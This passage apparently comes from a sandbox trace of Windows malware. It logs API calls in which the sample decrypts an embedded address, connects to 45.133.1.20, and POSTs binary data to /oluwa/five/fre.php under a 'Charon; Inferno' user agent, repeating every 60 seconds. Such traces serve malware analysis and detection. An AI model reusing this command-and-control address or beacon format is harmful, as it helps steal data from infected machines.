GetProcessHeap () returned 0x6a0000 [0182.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0182.806] GetProcessHeap () returned 0x6a0000 [0182.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0182.806] GetProcessHeap () returned 0x6a0000 [0182.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0182.806] closesocket (s=0x408) returned 0 [0182.807] GetProcessHeap () returned 0x6a0000 [0182.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0182.807] GetProcessHeap () returned 0x6a0000 [0182.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0182.807] GetProcessHeap () returned 0x6a0000 [0182.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0182.808] GetProcessHeap () returned 0x6a0000 [0182.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0182.809] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x10ac) returned 0x408 [0182.811] Sleep (dwMilliseconds=0xea60) [0182.812] GetProcessHeap () returned 0x6a0000 [0182.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0182.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.814] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.823] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0182.835] GetProcessHeap () returned 0x6a0000 [0182.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0182.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.836] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0182.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.840] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.841] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0182.841] GetProcessHeap () returned 0x6a0000 [0182.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0182.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.846] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0182.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.847] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0182.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.848] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0182.848] GetProcessHeap () returned 0x6a0000 [0182.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0182.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.849] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0182.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.851] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0182.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.852] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0182.853] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.853] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0182.853] GetProcessHeap () returned 0x6a0000 [0182.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0182.853] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0182.854] GetProcessHeap () returned 0x6a0000 [0182.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0182.854] GetProcessHeap () returned 0x6a0000 [0182.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0182.855] GetProcessHeap () returned 0x6a0000 [0182.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0182.855] GetProcessHeap () returned 0x6a0000 [0182.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0182.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.856] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.864] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0182.875] GetProcessHeap () returned 0x6a0000 [0182.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0182.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.878] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0182.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.879] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.880] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0182.880] GetProcessHeap () returned 0x6a0000 [0182.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0182.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.881] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0182.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.882] CryptDestroyKey (hKey=0x6ad560) returned 1 [0182.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.889] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0182.889] GetProcessHeap () returned 0x6a0000 [0182.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0182.889] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.890] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0182.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.890] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0182.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.891] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0182.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.892] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0182.892] GetProcessHeap () returned 0x6a0000 [0182.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0182.893] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ba090*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0182.893] GetProcessHeap () returned 0x6a0000 [0182.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0182.893] socket (af=2, type=1, protocol=6) returned 0x40c [0182.893] connect (s=0x40c, name=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0182.915] FreeAddrInfoW (pAddrInfo=0x6ba090*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0182.915] GetProcessHeap () returned 0x6a0000 [0182.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0182.915] GetProcessHeap () returned 0x6a0000 [0182.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0182.915] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0182.916] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0182.916] GetProcessHeap () returned 0x6a0000 [0182.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0182.916] GetProcessHeap () returned 0x6a0000 [0182.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0182.917] GetProcessHeap () returned 0x6a0000 [0182.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0182.917] GetProcessHeap () returned 0x6a0000 [0182.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0182.918] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0182.918] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0182.918] GetProcessHeap () returned 0x6a0000 [0182.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0182.918] GetProcessHeap () returned 0x6a0000 [0182.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0182.919] send (s=0x40c, buf=0x6bbd20*, len=242, flags=0) returned 242 [0182.921] send (s=0x40c, buf=0x6bb998*, len=159, flags=0) returned 159 [0182.921] GetProcessHeap () returned 0x6a0000 [0182.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0182.921] recv (in: s=0x40c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0182.987] GetProcessHeap () returned 0x6a0000 [0182.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0182.988] GetProcessHeap () returned 0x6a0000 [0182.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0182.988] GetProcessHeap () returned 0x6a0000 [0182.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0182.988] GetProcessHeap () returned 0x6a0000 [0182.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0182.989] closesocket (s=0x40c) returned 0 [0182.989] GetProcessHeap () returned 0x6a0000 [0182.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0182.989] GetProcessHeap () returned 0x6a0000 [0182.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0182.990] GetProcessHeap () returned 0x6a0000 [0182.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0182.990] GetProcessHeap () returned 0x6a0000 [0182.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0182.990] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x10d8) returned 0x40c [0182.992] Sleep (dwMilliseconds=0xea60) [0182.993] GetProcessHeap () returned 0x6a0000 [0182.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0182.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.995] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0183.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.016] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0183.025] GetProcessHeap () returned 0x6a0000 [0183.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0183.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.026] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0183.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.028] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0183.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.029] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0183.029] GetProcessHeap () returned 0x6a0000 [0183.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0183.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.034] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0183.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.065] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0183.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.066] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0183.066] GetProcessHeap () returned 0x6a0000 [0183.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0183.067] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.067] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0183.068] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.069] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0183.070] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.070] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0183.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.075] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0183.075] GetProcessHeap () returned 0x6a0000 [0183.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0183.075] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0183.075] GetProcessHeap () returned 0x6a0000 [0183.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0183.076] GetProcessHeap () returned 0x6a0000 [0183.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0183.076] GetProcessHeap () returned 0x6a0000 [0183.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0183.077] GetProcessHeap () returned 0x6a0000 [0183.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0183.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.078] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0183.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.100] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0183.111] GetProcessHeap () returned 0x6a0000 [0183.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0183.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.114] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0183.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.116] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0183.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.119] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0183.119] GetProcessHeap () returned 0x6a0000 [0183.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0183.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.121] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0183.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.122] CryptDestroyKey (hKey=0x6ad020) returned 1 [0183.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.124] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0183.124] GetProcessHeap () returned 0x6a0000 [0183.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0183.125] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.126] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0183.127] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.127] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0183.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.130] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0183.131] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.132] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0183.132] GetProcessHeap () returned 0x6a0000 [0183.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0183.132] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9aa0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be868*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0183.132] GetProcessHeap () returned 0x6a0000 [0183.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0183.132] socket (af=2, type=1, protocol=6) returned 0x410 [0183.132] connect (s=0x410, name=0x6be868*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0183.157] FreeAddrInfoW (pAddrInfo=0x6b9aa0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be868*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0183.157] GetProcessHeap () returned 0x6a0000 [0183.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0183.157] GetProcessHeap () returned 0x6a0000 [0183.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0183.158] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0183.159] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0183.159] GetProcessHeap () returned 0x6a0000 [0183.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0183.159] GetProcessHeap () returned 0x6a0000 [0183.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0183.160] GetProcessHeap () returned 0x6a0000 [0183.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0183.161] GetProcessHeap () returned 0x6a0000 [0183.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0183.162] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0183.163] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0183.163] GetProcessHeap () returned 0x6a0000 [0183.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0183.163] GetProcessHeap () returned 0x6a0000 [0183.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0183.164] send (s=0x410, buf=0x6bbd20*, len=242, flags=0) returned 242 [0183.164] send (s=0x410, buf=0x6bb998*, len=159, flags=0) returned 159 [0183.164] GetProcessHeap () returned 0x6a0000 [0183.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0183.164] recv (in: s=0x410, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0183.235] GetProcessHeap () returned 0x6a0000 [0183.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0183.235] GetProcessHeap () returned 0x6a0000 [0183.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0183.236] GetProcessHeap () returned 0x6a0000 [0183.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0183.236] GetProcessHeap () returned 0x6a0000 [0183.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0183.237] closesocket (s=0x410) returned 0 [0183.238] GetProcessHeap () returned 0x6a0000 [0183.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0183.238] GetProcessHeap () returned 0x6a0000 [0183.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0183.239] GetProcessHeap () returned 0x6a0000 